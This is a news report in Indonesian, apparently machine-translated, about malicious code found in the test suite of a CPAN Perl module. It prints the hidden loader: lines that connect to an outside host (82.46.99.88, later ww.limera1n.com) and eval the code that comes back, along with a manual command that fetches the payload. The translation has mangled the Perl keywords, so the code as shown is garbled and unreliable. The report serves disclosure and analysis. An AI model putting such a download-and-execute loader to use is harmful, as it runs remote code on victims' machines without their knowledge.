Dalam paket Perl didistribusikan melalui direktori CPAN , dirancang untuk memuat modul CPAN secara otomatis dengan cepat, kode berbahaya. Sisipan jahatnya adalah dalam kode pengujian , yang telah dikirimkan sejak 2011.
Patut dicatat bahwa pertanyaan tentang memuat kode yang meragukan muncul kembali pada tahun 2016.
Aktivitas berbahaya bermuara pada upaya mengunduh dan mengeksekusi kode dari server pihak ketiga (http://r.cx:1/) selama eksekusi rangkaian pengujian yang diluncurkan saat modul dipasang. Diasumsikan bahwa kode yang awalnya diunduh dari server eksternal tidak berbahaya, tetapi sekarang permintaan tersebut dialihkan ke domain ww.limera1n.com, yang menyediakan bagian kodenya untuk dieksekusi.
Untuk mengatur pengunduhan dalam suatu file Kode berikut digunakan:
$prog saya = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
$coba saya = `$^X $prog`;
Kode yang ditentukan menyebabkan skrip dieksekusi , yang isinya diringkas menjadi satu baris:
gunakan lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1β³};
Skrip ini dimuat menggunakan layanan tersebut kode dari host eksternal r.cx (kode karakter 82.46.99.88 sesuai dengan teks "R.cX") dan menjalankannya di blok eval.
$ perl -MIO::Socket -e'$b=baru IO::Socket::INET 82.46.99.88.":1β³; cetak <$b>;'
eval membongkar u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DEβ¦.}
Setelah membongkar, yang berikut ini akhirnya dijalankan: :
print{$b=baru IO::Socket::INET"ww.limera1n.com:80β³}"GET /iJailBreak
";evalor kembali memperingatkan$@sementara$b;1
Paket yang bermasalah kini telah dihapus dari repositori. (Perl Authors Upload Server), dan akun pembuat modul diblokir. Dalam hal ini, modulnya masih ada di arsip MetaCPAN dan dapat langsung diinstal dari MetaCPAN menggunakan beberapa utilitas seperti cpanminus. bahwa paket tersebut tidak didistribusikan secara luas.
Menarik untuk dibahas dan penulis modul, yang menyangkal informasi bahwa kode berbahaya dimasukkan setelah situsnya "r.cx" diretas dan menjelaskan bahwa dia hanya bersenang-senang, dan menggunakan perlobfuscator.com bukan untuk menyembunyikan sesuatu, tetapi untuk mengurangi ukurannya kode dan menyederhanakan penyalinannya melalui clipboard. Pemilihan nama fungsi βbotstrapβ dijelaskan oleh fakta bahwa kata ini βterdengar seperti bot dan lebih pendek dari bootstrap.β Penulis modul juga meyakinkan bahwa manipulasi yang teridentifikasi tidak melakukan tindakan jahat, tetapi hanya menunjukkan pemuatan dan eksekusi kode melalui TCP.
Sumber: opennet.ru